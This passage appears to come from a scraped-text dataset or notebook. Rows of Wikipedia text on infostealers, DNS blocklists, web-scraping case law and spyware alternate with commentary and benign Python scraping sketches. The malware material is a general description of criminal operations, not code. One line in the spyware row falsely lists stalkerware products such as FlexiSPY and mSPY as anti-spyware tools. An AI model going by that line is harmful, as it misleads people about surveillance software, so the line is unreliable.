not send EDNS Client Subnet information in its DNS requests. 37 38 |
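The entry above mentions that pages can be duplicated between archive.today and web.archive.org. As a small illustration, the Wayback Machine publishes an availability endpoint that reports the closest stored snapshot for a URL; a hedged sketch, assuming that endpoint behaves as described and using an illustrative target URL:

import requests

target = "https://example.com/"  # illustrative URL to look up
resp = requests.get("https://archive.org/wayback/available",
                    params={"url": target}, timeout=10)
data = resp.json()

# "archived_snapshots" -> "closest" holds the nearest stored capture, if any.
snapshot = data.get("archived_snapshots", {}).get("closest")
if snapshot:
    print("Closest snapshot:", snapshot.get("url"), "taken at", snapshot.get("timestamp"))
else:
    print("No snapshot recorded for", target)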
136 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Infostealer | In computing, infostealers are a type of trojan, a form of malicious software, created to breach computer systems to steal sensitive information—including login details, session cookies, financial information, and personally identifiable information. The stolen information are then packaged, sent to the attacker, and often traded on illicit markets to other threat actors. Infostealers usually consist of two parts, the bot framework that allows the attacker to configure the behaviour of the infostealer on the victim's computer and a management panel which takes the form of a server to which the infostealer sends data. Infostealers can infiltrate a computer or device through methods such as phishing attacks, infected websites, and malicious software downloads including video game mods and pirated software. Once downloaded, the infostealers gather sensitive information about the user's computer before sending the data back to the server. Infostealers are usually distributed under the malware-as-a-service (MaaS) model, developers allow other parties to use their infostealers for subscription fees. This allows people with different levels of technical knowledge to deploy an infostealer. The functionality of infostealers can vary, with some focused on data harvesting, while others offer remote access that allows additional malware to be executed. Stolen data may then be used in spearphishing campaigns for other cyber-attacks, such as the deployment of ransomware. The proliferation of infostealer services have contributed to an increase in the number of cybersecurity incidents involving infostealers. The number of stolen data logs being sold on the Russian Market, a cybercrime forum, have increased significantly since 2022. According to Kaspersky's research in mid 2023, 24% of malware offered as a service are infostealers. In cybercrime, credential theft is a well-known mechanism through which malicious individuals steal personal information such as usernames, passwords, or cookies to illegitimately gain access to a victim's online accounts and computer. This crime typically unfolds in four stages, with the first being the acquisition of the stolen credentials. Infostealers, are a specific type of malware, that are designed for this initial stage. They usually consist of two distinct parts: the bot framework and a command and control server, often known as the management panel or interface. 1 The bot framework, includes a builder that allows the attacker to configure how the infostealer will behave on a user's computer and what kind of information it will steal. The management interface, usually written in traditional web development languages like PHP, HTML, and JavaScript 2 is typically hosted on the commercial cloud infrastructure. 3 The management interface, primarily functions as a web server to which the infostealer send confidential information. The interface also provides the attacker with information about the status of the deployed infostealers and allows the attacker to control the behavior of the infostealers. 2 Infostealers are commonly distributed through the malware-as-a-service (MaaS) model, enabling individuals with varying technical knowledge to deploy these malicious programs. Under this model, three distinct groups typically emerge: developers, malware service providers, and operators. Developers, the most technically skilled, write the infostealer code. 
Malware service providers purchase licenses for the malware and offer it as a service to other cyber criminals. The operators, who can be either developers themselves or service providers depending on their skill level, use these services to perform credential theft. 1 Once the malware is purchased, it is spread to target victim machines using various social engineering techniques. Phishing, including spear phishing campaigns that target specific victims, are commonly employed. Infostealers are commonly embedded in email attachments or malicious links that link to websites performing drive-by downloads. 4 2 Additionally, they are often bundled with compromised or malicious browser extensions, infected game mods, and pirated or otherwise compromised software. 4 After the stealer is downloaded and run by a victim, it communicates with the attacker's command and control servers, allowing the attacker to steal information from the user's computer. While most infostealers primarily target credentials, some also enable attackers to remotely introduce and execute other malware, such as ransomware, on the victim's computer. 1 5 Credentials obtained from infostealer attacks are often distributed as logs or credential dumps, typically shared on paste sites like Pastebin, where cybercriminals may offer free samples, or sold in bulk on underground hacking forums often for amounts as low as $10. 6 7 Buyers of these stolen credentials usually log in to assess their value, particularly looking for credentials associated with financial services or linked to other credentials with similar patterns, as these are especially valuable. 8 High-value credentials are often resold to other cybercriminals at higher prices, 9 who may then use them for various crimes, including financial fraud, 10 integrating the credentials into zombie networks and reputation boosting operations 10 or as springboards for more sophisticated attacks such as scamming businesses, distributing ransomware, or conducting state-sponsored espionage. 11 6 Additionally, some cybercriminals use stolen credentials for social engineering attacks, impersonating the original owner to claim they have been a victim of a crime and soliciting money from the victim’s contacts. 12 13 Many buyers of these stolen credentials take precautions to maintain access for longer periods, such as changing passwords, using Tor networks to obscure their locations, which helps avoid detection by services that might otherwise identify and shut down the stolen credentials. 12 14 An infostealers primary function is to exfiltrate sensitive information about the victim to a attacker's command and control servers. The exact type of data that is exfiltrated will depend on the data-stealing features enabled by the operator and the specific variant of infostealer used. 15 Most infostealers however, do contain functionality to harvest a variety of information about the host operating system, system settings and user profiles. Some more advanced infostealers include the capability to introduce secondary malware like remote access trojans and ransomware. 2 In 2009, researchers at the Symantec Rapid Response team released a technical analysis of the Zeus infostealer, one of the first infostealers to be created. 16 They found that the malware automatically exfiltrated all data stored in a computer's protected storage service (which was usually used by Internet Explorer to store passwords) and tries to capture any passwords sent to the computer using the POP3 and FTP protocol. 
In addition to this the malware allowed the researchers to define a set of configuration files to specify a list of web injections to perform on a user's computer as well as another configuration file that controlled which web URLs the malware would monitor. Another additional configuration also allowed the researchers to define a set of rules that could be used to test if additional HTTP requests contained passwords or other sensitive information. 17 More recently, in 2020, researchers at the Eindhoven University of Technology conducted a study on the information available for sale on the underground credential black-market impaas.ru. As part of their study, they were able to replicate the workings of a version of the AZORult infostealer. Amongst the functions discovered by the researchers was a builder which allowed operators to define what kind of data would be stolen. The researchers also found evidence of plugins that stole a user's browsing history, a customizable regex based mechanism that allows the attacker to retrieve arbitrary files from a user's computer, a browser password extractor module, a module to extract Skype history and a module to find and exfiltrate cryptocurrency wallet files. 15 The researchers also found that the data most frequently stolen using the AZORult infostealers and sold on the black market could be broadly categorized into three main types: fingerprints, cookies, and resources. Fingerprints consisted of identifiers that were constructed from probing a variety of features made available by the browser. These were not tied to a specific service but were considered to be an accurately unique identifier for a user's browsers. Cookies allowed buyers to hijack a victim's browser session by injecting it into a browser environment. Resources referred to browser-related files found on a user's operating system, such as password storage files. 18 Setting up an infostealer operation has become increasingly accessible due to the proliferation of stealer-as-a-service enterprises, which have significantly lowered the financial and technical barriers. This makes it feasible for even less sophisticated cybercriminals to engage in such activities. 2 In a 2023 paper, researchers from the Georgia Institute of Technology noted that the hosted stealer market is extremely mature and highly competitive, with some operators offering to set up infostealers for as low as $12. 19 For the service providers running these stealer operations, the business is also highly profitable. The researchers estimated that a typical infostealer operator incurs only a few one-off costs: the license to use the infostealer which is obtained from a malware developer, and the registration fee for the domain used to host the command and control server. The primary ongoing cost incurred by these operators is the cost associated with hosting the servers. Based on these calculations, the researchers concluded that the stealer-as-a-service business model is extremely profitable, with many operators achieving profit margins of over 90% with revenues in the high thousands. 20 Due their extremely profitability and accessibility the number of cybersecurity incidents that involve infostealers are on the rise. 6 The COVID 19 post-pandemic shift towards remote and hybrid work, where companies give employees access to enterprise services on their home machines has also been cited as one of the reasons behind the increase in the effectiveness of infostealers. 
21 6 In 2023, research by Secureworks discovered that the number of infostealer logs—data exfiltrated from each computer—being sold on the Russian Market, the biggest underground market increased from 2 million to 5 million logs from June 2022 to February 2023. 21 According to Kaspersky's research in mid 2023, 24% of malware offered as a service are infostealers. 22 |
137 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/DNSBL | A Domain Name System blocklist, Domain Name System-based blackhole list, Domain Name System blacklist (DNSBL) or real-time blackhole list (RBL) is a service for operation of mail servers to perform a check via a Domain Name System (DNS) query whether a sending host's IP address is blacklisted for email spam. 1 Most mail server software can be configured to check such lists, typically rejecting or flagging messages from such sites. A DNSBL is a software mechanism, rather than a specific list or policy. Dozens of DNSBLs exist. 2 They use a wide array of criteria for listing and delisting addresses. These may include listing the addresses of zombie computers or other machines being used to send spam, Internet service providers (ISPs) who willingly host spammers, or those which have sent spam to a honeypot system. Since the creation of the first DNSBL in 1998, the operation and policies of these lists have frequently been controversial, 3 4 both in Internet advocacy circles and occasionally in lawsuits. Many email systems operators and users 5 consider DNSBLs a valuable tool to share information about sources of spam, but others including some prominent Internet activists have objected to them as a form of censorship. 6 7 8 9 In addition, a small number of DNSBL operators have been the target of lawsuits filed by spammers seeking to have the lists shut down. 10 The first DNSBL was the Real-time Blackhole List (RBL), created in 1997, at first as a Border Gateway Protocol (BGP) feed by Paul Vixie, and then as a DNSBL by Eric Ziegast as part of Vixie's Mail Abuse Prevention System (MAPS); Dave Rand at Abovenet was its first subscriber. 11 The very first version of the RBL was not published as a DNSBL, but rather a list of networks transmitted via BGP to routers owned by subscribers so that network operators could drop all TCP IP traffic for machines used to send spam or host spam supporting services, such as a website. The inventor of the technique later commonly called a DNSBL was Eric Ziegast while employed at Vixie Enterprises. The term "blackhole" refers to a networking black hole, an expression for a link on a network that drops incoming traffic instead of forwarding it normally. The intent of the RBL was that sites using it would refuse traffic from sites which supported spam — whether by actively sending spam, or in other ways. Before an address would be listed on the RBL, volunteers and MAPS staff would attempt repeatedly to contact the persons responsible for it and get its problems corrected. Such effort was considered very important before black-holing all network traffic, but it also meant that spammers and spam supporting ISPs could delay being put on the RBL for long periods while such discussions went on. Later, the RBL was also released in a DNSBL form and Paul Vixie encouraged the authors of sendmail and other mail software to implement RBL support in their clients. These allowed the mail software to query the RBL and reject mail from listed sites on a per-mail-server basis instead of black-holing all traffic. Soon after the advent of the RBL, others started developing their own lists with different policies. One of the first was Alan Brown's Open Relay Behavior-modification System (ORBS). This used automated testing to discover and list mail servers running as open mail relays—exploitable by spammers to carry their spam. 
ORBS was controversial at the time because many people felt running an open relay was acceptable, and that scanning the Internet for open mail servers could be abusive. In 2003, a number of DNSBLs came under denial-of-service attacks (DOS). Since no party has admitted to these attacks nor been discovered responsible, their purpose is a matter of speculation. However, many observers believe the attacks are perpetrated by spammers in order to interfere with the DNSBLs' operation or hound them into shutting down. In August 2003, the firm Osirusoft, an operator of several DNSBLs including one based on the SPEWS data set, shut down its lists after suffering weeks of near-continuous attack. Technical specifications for DNSBLs came relatively late in RFC5782. 12 A Uniform Resource Identifier (URI) DNSBL is a DNSBL that lists the domain names and sometimes also IP addresses which are found in the "clickable" links contained in the body of spams, but generally not found inside legitimate messages. URI DNSBLs were created when it was determined that much spam made it past spam filters during that short time frame between the first use of a spam-sending IP address and the point where that sending IP address was first listed on major sending-IP-based DNSBLs. In many cases, such elusive spam contains in their links domain names or IP addresses (collectively referred to as a URIs) where that URI was already spotted in previously caught spam and where that URI is not found in non-spam e-mail. Therefore, when a spam filter extracts all URIs from a message and checks them against a URI DNSBL, then the spam can be blocked even if the sending IP for that spam has not yet been listed on any sending IP DNSBL. Of the three major URI DNSBLs, the oldest and most popular is SURBL. 13 After SURBL was created, some of the volunteers for SURBL started the second major URI DNSBL, URIBL. 14 In 2008, another long-time SURBL volunteer started another URI DNSBL, ivmURI. 15 The Spamhaus Project provides the Spamhaus Domain Block List (DBL) which they describe as domains "found in spam messages". 16 The DBL is intended as both a URIBL and RHSBL, to be checked against both domains in a message's envelope and headers and domains in URLs in message bodies. Unlike other URIBLs, the DBL only lists domain names, not IP addresses, since Spamhaus provides other lists of IP addresses. URI DNSBLs are often confused with RHSBLs (Right Hand Side BLs). But they are different. A URI DNSBL lists domain names and IPs found in the body of the message. An RHSBL lists the domain names used in the "from" or "reply-to" e-mail address. RHSBLs are of debatable effectiveness since many spams either use forged "from" addresses or use "from" addresses containing popular freemail domain names, such as gmail.com, yahoo.com, or hotmail.com URI DNSBLs are more widely used than RHSBLs, are very effective, and are used by the majority of spam filters. To operate a DNSBL requires three things: a domain to host it under, a nameserver for that domain, and a list of addresses to publish. It is possible to serve a DNSBL using any general-purpose DNS server software. However this is typically inefficient for zones containing large numbers of addresses, particularly DNSBLs which list entire Classless Inter-Domain Routing netblocks. For the large resource consumption when using software designed as the role of a Domain Name Server, there are role-specific software applications designed specifically for servers with a role of a DNS blacklist. 
The hard part of operating a DNSBL is populating it with addresses. DNSBLs intended for public use usually have specific, published policies as to what a listing means, and must be operated accordingly to attain or sustain public confidence. When a mail server receives a connection from a client, and wishes to check that client against a DNSBL (let's say, dnsbl.example.net), it does more or less the following: Looking up an address in a DNSBL is thus similar to looking it up in reverse-DNS. The differences are that a DNSBL lookup uses the "A" rather than "PTR" record type, and uses a forward domain (such as dnsbl.example.net above) rather than the special reverse domain in-addr.arpa. There is an informal protocol for the addresses returned by DNSBL queries which match. Most DNSBLs return an address in the 127.0.0.0 8 IP loopback network. The address 127.0.0.2 indicates a generic listing. Other addresses in this block may indicate something specific about the listing—that it indicates an open relay, proxy, spammer-owned host, etc. For details see RFC 5782. A URI DNSBL query (and an RHSBL query) is fairly straightforward. The domain name to query is prepended to the DNS list host as follows: where dnslist.example.com is the DNS list host and example.net is the queried domain. Generally if an A record is returned the name is listed. Different DNSBLs have different policies. DNSBL policies differ from one another on three fronts: In addition to the different types of listed entities (IP addresses for traditional DNSBLs, host and domain names for RHSBLs, URIs for URIBLs) there is a wide range of semantic variations between lists as to what a listing means. List maintainers themselves have been divided on the issues of whether their listings should be seen as statements of objective fact or subjective opinion and on how their lists should best be used. As a result, there is no definitive taxonomy for DNSBLs. Some names defined here (e.g. "Yellow" and "NoBL" 17 ) are varieties that are not in widespread use and so the names themselves are not in widespread use, but should be recognized by many spam control specialists. Some end-users and organizations have concerns regarding the concept of DNSBLs or the specifics of how they are created and used. Some of the criticisms include: Despite the criticisms, few people object to the principle that mail-receiving sites should be able to reject undesired mail systematically. One person who does is John Gilmore, who deliberately operates an open mail relay. Gilmore accuses DNSBL operators of violating antitrust law. For Joe Blow to refuse emails is legal (though it's bad policy, akin to "shooting the messenger"). But if Joe and ten million friends all gang up to make a blacklist, they are exercising illegal monopoly power. 24 A number of parties, such as the Electronic Frontier Foundation and Peacefire, have raised concerns about some use of DNSBLs by ISPs. One joint statement issued by a group including EFF and Peacefire addressed "stealth blocking", in which ISPs use DNSBLs or other spam-blocking techniques without informing their clients. 25 Spammers have pursued lawsuits against DNSBL operators on similar grounds: |
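The entry above outlines the DNSBL lookup procedure: reverse the IPv4 octets, prepend them to the list's zone (for example, 192.0.2.1 checked against dnsbl.example.net becomes 1.2.0.192.dnsbl.example.net), and query for an A record, where an answer in 127.0.0.0/8 indicates a listing and NXDOMAIN indicates the address is not listed. A minimal sketch, using the placeholder zone name from the text:

import socket

def dnsbl_check(ip, zone="dnsbl.example.net"):
    # Reverse the octets and prepend them to the DNSBL zone, then do an A lookup.
    query = ".".join(reversed(ip.split("."))) + "." + zone
    try:
        answer = socket.gethostbyname(query)
        # By convention, listed addresses resolve inside 127.0.0.0/8.
        return answer.startswith("127.")
    except socket.gaierror:
        # NXDOMAIN (or an unreachable zone) means the address is not listed.
        return False

# Example call; returns False here because dnsbl.example.net is not a real list.
print(dnsbl_check("192.0.2.1"))

A URI DNSBL or RHSBL query works the same way, except that a domain name, rather than reversed octets, is prepended to the list host.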
16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 
26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
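The fetch-then-extract workflow described in row 138 above (download a page, parse it, and copy the data into a spreadsheet or database) is exactly what the libraries imported at the top of this notebook are for. The sketch below is a minimal illustration only, not the code that produced these rows; the target URL, the choice of paragraph tags, and the CSV filename are assumptions made for the example.
import requests
from bs4 import BeautifulSoup
import pandas as pd

def fetch_and_extract(url):
    # Fetch: download the page, as a browser would when a user views it
    response = requests.get(url, timeout=10)
    response.raise_for_status()
    # Extract: parse the HTML and pull out the visible paragraph text
    soup = BeautifulSoup(response.text, "html5lib")
    return [p.get_text(" ", strip=True) for p in soup.find_all("p")]

# Example usage (hypothetical output file):
# paragraphs = fetch_and_extract("https://en.wikipedia.org/wiki/Web_scraping")
# pd.DataFrame({"text": paragraphs}).to_csv("scraped_paragraphs.csv", index=False)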
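Row 138 also mentions two lower-level techniques: grep-style regular-expression matching and XPath queries over a DOM tree. Both are sketched below under stated assumptions; the regex pattern, the element id, and the lxml dependency (which the cells above do not install) are choices made for illustration, not something taken from the scraped article.
import re
import requests

html = requests.get("https://en.wikipedia.org/wiki/Web_scraping", timeout=10).text

# Grep-style extraction: quick, but brittle compared with a real HTML parser
headings = re.findall(r"<h2[^>]*>(.*?)</h2>", html, flags=re.S)

# XPath over a DOM tree (requires `pip install lxml`, not installed above)
import lxml.html
tree = lxml.html.fromstring(html)
links = tree.xpath('//div[@id="bodyContent"]//a/@href')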
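Among the tools listed in row 138, Scrapy is the one that combines crawling (fetching pages and following links) with extraction in a single framework. A minimal spider might look like the sketch below; it assumes `pip install scrapy` (not run above), and the spider name, selectors, and depth limit are hypothetical choices rather than settings used anywhere in this notebook.
import scrapy

class ParagraphSpider(scrapy.Spider):
    name = "paragraphs"                                  # hypothetical spider name
    start_urls = ["https://en.wikipedia.org/wiki/Web_scraping"]
    custom_settings = {"DEPTH_LIMIT": 1}                 # follow links one hop deep only

    def parse(self, response):
        # Extract: one item per paragraph of body text
        for p in response.css("div#bodyContent p"):
            yield {"text": " ".join(p.css("::text").getall()).strip()}
        # Crawl: follow in-article links and parse them the same way
        for href in response.css("div#bodyContent a::attr(href)").getall():
            if href.startswith("/wiki/"):
                yield response.follow(href, callback=self.parse)

# Run from a shell, not from this notebook:
#   scrapy runspider paragraph_spider.py -o paragraphs.json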
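Row 138 ends just as it begins listing the measures a site administrator can use to stop or slow a bot. From the scraper's side, the usual courtesy response to those measures is to honour robots.txt and pace requests, which the standard library can do; the user-agent string and the one-second fallback delay below are assumptions for the sketch.
import time
from urllib.robotparser import RobotFileParser

rp = RobotFileParser()
rp.set_url("https://en.wikipedia.org/robots.txt")
rp.read()

url = "https://en.wikipedia.org/wiki/Web_scraping"
agent = "ExampleScraper/0.1"                     # hypothetical user-agent string
if rp.can_fetch(agent, url):
    delay = rp.crawl_delay(agent) or 1           # fall back to 1 second if unspecified
    time.sleep(delay)
    # ... fetch the page here ...
else:
    print("robots.txt disallows fetching", url)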
139 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Spyware | Spyware (a portmanteau for spying software) is any software with malicious behavior that aims to gather information about a person or organization and send it to another entity in a way that harms the user by violating their privacy, endangering their device's security, or other means. This behavior may be present in malware and in legitimate software. Websites may engage in spyware behaviors like web tracking. Hardware devices may also be affected. 1 Spyware is frequently associated with advertising and involves many of the same issues. Because these behaviors are so common, and can have non-harmful uses, providing a precise definition of spyware is a difficult task. 2 The first recorded use of the term spyware occurred on October 16, 1995, in a Usenet post that poked fun at Microsoft's business model. 3 Spyware at first denoted software meant for espionage purposes. However, in early 2000 the founder of Zone Labs, Gregor Freund, used the term in a press release for the ZoneAlarm Personal Firewall. 4 Later in 2000, a parent using ZoneAlarm was alerted to the fact that Reader Rabbit, educational software marketed to children by the Mattel toy company, was surreptitiously sending data back to Mattel. 5 Since then, "spyware" has taken on its present sense. According to a 2005 study by AOL and the National Cyber-Security Alliance, 61 percent of surveyed users' computers were infected with some form of spyware. 92 percent of surveyed users with spyware reported that they did not know of its presence, and 91 percent reported that they had not given permission for the installation of the spyware. 6 As of 2006 update , spyware has become one of the preeminent security threats to computer systems running Microsoft Windows operating systems. Computers on which Internet Explorer (IE) was the primary browser are particularly vulnerable to such attacks, not only because IE was the most widely used, 7 but also because its tight integration with Windows allows spyware access to crucial parts of the operating system. 7 8 Before Internet Explorer 6 SP2 was released as part of Windows XP Service Pack 2, the browser would automatically display an installation window for any ActiveX component that a website wanted to install. The combination of user ignorance about these changes, and the assumption by Internet Explorer that all ActiveX components are benign, helped to spread spyware significantly. Many spyware components would also make use of exploits in JavaScript, Internet Explorer and Windows to install without user knowledge or permission. The Windows Registry contains multiple sections where modification of key values allows software to be executed automatically when the operating system boots. Spyware can exploit this design to circumvent attempts at removal. The spyware typically links itself to each location in the registry that allows execution. Once running, the spyware will periodically check if any of these links are removed. If so, they will be automatically restored. This ensures that the spyware will execute when the operating system is booted, even if some (or most) of the registry links are removed. Spyware is mostly classified into four types: adware, system monitors, tracking including web tracking, and trojans; 9 examples of other notorious types include digital rights management capabilities that "phone home", keyloggers, rootkits, and web beacons. 
These four categories are not mutually exclusive and they have similar tactics in attacking networks and devices. 10 The main goal is to install, hack into the network, avoid being detected, and safely remove themselves from the network. 10 Spyware is mostly used for the stealing information and storing Internet users' movements on the Web and serving up pop-up ads to Internet users. 11 Whenever spyware is used for malicious purposes, its presence is typically hidden from the user and can be difficult to detect. Some spyware, such as keyloggers, may be installed by the owner of a shared, corporate, or public computer intentionally in order to monitor users. While the term spyware suggests software that monitors a user's computer, the functions of spyware can extend beyond simple monitoring. Spyware can collect almost any type of data, including personal information like internet surfing habits, user logins, and bank or credit account information. Spyware can also interfere with a user's control of a computer by installing additional software or redirecting web browsers. 12 Some spyware can change computer settings, which can result in slow Internet connection speeds, un-authorized changes in browser settings, or changes to software settings. Sometimes, spyware is included along with genuine software, and may come from a malicious website or may have been added to the intentional functionality of genuine software (see the paragraph about Facebook, below). In response to the emergence of spyware, a small industry has sprung up dealing in anti-spyware software. Running anti-spyware software has become a widely recognized element of computer security practices, especially for computers running Microsoft Windows. A number of jurisdictions have passed anti-spyware laws, which usually target any software that is surreptitiously installed to control a user's computer. In German-speaking countries, spyware used or made by the government is called govware by computer experts (in common parlance: Regierungstrojaner, literally "Government Trojan"). Govware is typically a trojan horse software used to intercept communications from the target computer. Some countries, like Switzerland and Germany, have a legal framework governing the use of such software. 13 14 In the US, the term "policeware" has been used for similar purposes. 15 Use of the term "spyware" has eventually declined as the practice of tracking users has been pushed ever further into the mainstream by major websites and data mining companies; these generally break no known laws and compel users to be tracked, not by fraudulent practices per se, but by the default settings created for users and the language of terms-of-service agreements. In one documented example, on CBS CNet News reported, on March 7, 2011, an analysis in The Wall Street Journal revealed the practice of Facebook and other websites of tracking users' browsing activity, which is linked to their identity, far beyond users' visits and activity on the Facebook site itself. The report stated: "Here's how it works. You go to Facebook, you log in, you spend some time there, and then ... you move on without logging out. Let's say the next site you go to is The New York Times. Those buttons, without you clicking on them, have just reported back to Facebook and Twitter that you went there and also your identity within those accounts. Let's say you moved on to something like a site about depression. 
This one also has a tweet button, a Google widget, and those, too, can report back who you are and that you went there. The Wall Street Journal analysis was researched by Brian Kennish, founder of Disconnect, Inc. 16 Spyware does not necessarily spread in the same way as a virus or worm because infected systems generally do not attempt to transmit or copy the software to other computers. Instead, spyware installs itself on a system by deceiving the user or by exploiting software vulnerabilities. Most spyware is installed without knowledge, or by using deceptive tactics. Spyware may try to deceive users by bundling itself with desirable software. Other common tactics are using a Trojan horse, spy gadgets that look like normal devices but turn out to be something else, such as a USB Keylogger. These devices actually are connected to the device as memory units but are capable of recording each stroke made on the keyboard. Some spyware authors infect a system through security holes in the Web browser or in other software. When the user navigates to a Web page controlled by the spyware author, the page contains code which attacks the browser and forces the download and installation of spyware. The installation of spyware frequently involves Internet Explorer. Its popularity and history of security issues have made it a frequent target. Its deep integration with the Windows environment make it susceptible to attack into the Windows operating system. Internet Explorer also serves as a point of attachment for spyware in the form of Browser Helper Objects, which modify the browser's behaviour. A spyware rarely operates alone on a computer; an affected machine usually has multiple infections. Users frequently notice unwanted behavior and degradation of system performance. A spyware infestation can create significant unwanted CPU activity, disk usage, and network traffic. Stability issues, such as applications freezing, failure to boot, and system-wide crashes are also common. Usually, this effect is intentional, but may be caused from the malware simply requiring large amounts of computing power, disk space, or network usage. Spyware, which interferes with networking software commonly causes difficulty connecting to the Internet. In some infections, the spyware is not even evident. Users assume in those situations that the performance issues relate to faulty hardware, Windows installation problems, or another malware infection. Some owners of badly infected systems resort to contacting technical support experts, or even buying a new computer because the existing system "has become too slow". Badly infected systems may require a clean reinstallation of all their software in order to return to full functionality. Moreover, some types of spyware disable software firewalls and antivirus software, and or reduce browser security settings, which opens the system to further opportunistic infections. Some spyware disables or even removes competing spyware programs, on the grounds that more spyware-related annoyances increase the likelihood that users will take action to remove the programs. 17 Keyloggers are sometimes part of malware packages downloaded onto computers without the owners' knowledge. Some keylogger software is freely available on the internet, while others are commercial or private applications. Most keyloggers allow not only keyboard keystrokes to be captured, they also are often capable of collecting screen captures from the computer. 
A typical Windows user has administrative privileges, mostly for convenience. Because of this, any program the user runs has unrestricted access to the system. As with other operating systems, Windows users are able to follow the principle of least privilege and use non-administrator accounts. Alternatively, they can reduce the privileges of specific vulnerable Internet-facing processes, such as Internet Explorer. Since Windows Vista is, by default, a computer administrator that runs everything under limited user privileges, when a program requires administrative privileges, a User Account Control pop-up will prompt the user to allow or deny the action. This improves on the design used by previous versions of Windows. Spyware is also known as tracking software. As the spyware threat has evolved, a number of techniques have emerged to counteract it. These include programs designed to remove or block spyware, as well as various user practices which reduce the chance of getting spyware on a system. Nonetheless, spyware remains a costly problem. When a large number of pieces of spyware have infected a Windows computer, the only remedy may involve backing up user data, and fully reinstalling the operating system. For instance, some spyware cannot be completely removed by Symantec, Microsoft, PC Tools. Many programmers and some commercial firms have released products designed to remove or block spyware. Programs such as PC Tools' Spyware Doctor, Lavasoft's Ad-Aware SE and Patrick Kolla's Spybot - Search Destroy rapidly gained popularity as tools to remove, and in some cases intercept, spyware programs. On December, 2004, Microsoft acquired the GIANT AntiSpyware software, 18 re branding it as Microsoft AntiSpyware (Beta 1) and releasing it as a free download for Genuine Windows XP and Windows 2003 users. In November, 2005, it was renamed Windows Defender. 19 20 Major anti-virus firms such as Symantec, PC Tools, McAfee and Sophos have also added anti-spyware features to their existing anti-virus products. Early on, anti-virus firms expressed reluctance to add anti-spyware functions, citing lawsuits brought by spyware authors against the authors of web sites and programs which described their products as "spyware". However, recent versions of these major firms home and business anti-virus products do include anti-spyware functions, albeit treated differently from viruses. Symantec Anti-Virus, for instance, categorizes spyware programs as "extended threats" and now offers real-time protection against these threats. Other Anti-spyware tools include FlexiSPY, Mobilespy, mSPY, TheWiSPY, and UMobix. 21 Anti-spyware programs can combat spyware in two ways: Such programs inspect the contents of the Windows registry, operating system files, and installed programs, and remove files and entries which match a list of known spyware. Real-time protection from spyware works identically to real-time anti-virus protection: the software scans disk files at download time, and blocks the activity of components known to represent spyware. In some cases, it may also intercept attempts to install start-up items or to modify browser settings. Earlier versions of anti-spyware programs focused chiefly on detection and removal. Javacool Software's SpywareBlaster, one of the first to offer real-time protection, blocked the installation of ActiveX-based spyware. Like most anti-virus software, many anti-spyware adware tools require a frequently updated database of threats. 
